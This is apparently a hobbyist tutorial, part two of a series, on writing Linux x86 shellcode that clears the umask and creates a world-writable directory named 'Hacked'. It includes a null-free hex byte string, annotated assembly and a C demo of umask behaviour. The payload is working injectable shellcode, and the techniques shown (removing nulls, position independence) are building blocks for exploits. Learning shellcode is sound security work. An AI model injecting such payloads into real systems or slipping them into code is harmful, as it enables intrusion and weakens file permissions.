Here's part 2 of my previous tut (HERE).
I would recommend reading my previous tut before starting this one.
Moving on to mkdir shellcode: this shellcode creates a directory with permissions 777, which means read, write and execute for all.
Algorithm
Make umask 0, then create a directory with permission 777 (in octal) and simply exit.
Now the question arises: why did we make umask 0?
The answer lies in how mkdir works: if you pass mkdir some permissions for creating a directory, it sets the permissions of the newly created directory to ~umask & (permission). So by making umask 0, ~umask = 11111111 (NOTE: here every 1 corresponds to a bit), which means whichever permissions you give for the directory, they'll be applied as is. Got it? Cool.. let's move your ass further.
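
To see the ~umask & (permission) rule in action, here is an added example (not part of the original tut) that calls mkdir with mode 0777 under different umask values and reads back the permissions. The function name mode_after_mkdir and the /tmp scratch path are assumptions made for the demo.

```c
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create a directory with the requested mode while the given umask is
 * active, then return the permission bits the kernel actually applied
 * (mode & ~umask), or -1 on error. Everything is cleaned up afterwards. */
int mode_after_mkdir(mode_t mask, mode_t requested)
{
    char base[64], path[80];
    struct stat st;
    int result = -1;

    /* Constructed scratch location; mkdir fails safely if it already exists. */
    snprintf(base, sizeof base, "/tmp/umask_demo_%ld", (long)getpid());
    if (mkdir(base, 0700) != 0)
        return -1;
    snprintf(path, sizeof path, "%s/d", base);

    mode_t old = umask(mask);          /* same call the shellcode makes first */
    if (mkdir(path, requested) == 0 && stat(path, &st) == 0)
        result = (int)(st.st_mode & 0777);
    umask(old);                        /* restore the caller's mask */

    rmdir(path);
    rmdir(base);
    return result;
}

int main(void)
{
    /* Typical default mask: group/other write bits are stripped. */
    printf("umask 022, mkdir 0777 -> %04o\n", mode_after_mkdir(022, 0777));
    /* Mask cleared, as in the shellcode: the requested mode is applied as is. */
    printf("umask 000, mkdir 0777 -> %04o\n", mode_after_mkdir(0, 0777));
    /* Restrictive mask: only the owner keeps access. */
    printf("umask 077, mkdir 0777 -> %04o\n", mode_after_mkdir(077, 0777));
    return 0;
}
```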

I've removed all the nulls from the shellcode, made it PIC, and here is the shellcode:
\x31\xdb\xf7\xe3\xb0\x3c\xcd\x80\x31\xc9\x5b\xb0\x27\x66\xb9\xff\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x48\x61\x63\x6b\x65\x64
In assembly, it is:
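.text
.globl _start
shellcode:

	xorl %ebx, %ebx		# ebx = 0 (the new umask)
	mull %ebx		# edx:eax = eax * 0, so eax and edx are cleared
	movb $60, %al		# syscall number 60 = umask
	int $0x80		# umask syscall on x86 system

	xorl %ecx, %ecx		# ecx = 0
	popl %ebx		# return address pushed by call = address of "Hacked"
	movb $39, %al		# syscall number 39 = mkdir
	movw $0777, %cx		# mode 0777 (octal)
	int $0x80		# mkdir syscall

	movb $1, %al		# syscall number 1 = exit
	int $0x80		# Exit syscall
_start:
	call shellcode		# pushes the address of the string below
	.asciz "Hacked"		# Name of the directory to be created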
If you know assembly, the code is fairly self-explanatory; if you're having problems understanding what the fuck I've given, go learn assembly.


After putting the shellcode in a C program, we verify it 


Now you've created a directory with permission 777, go play with it.
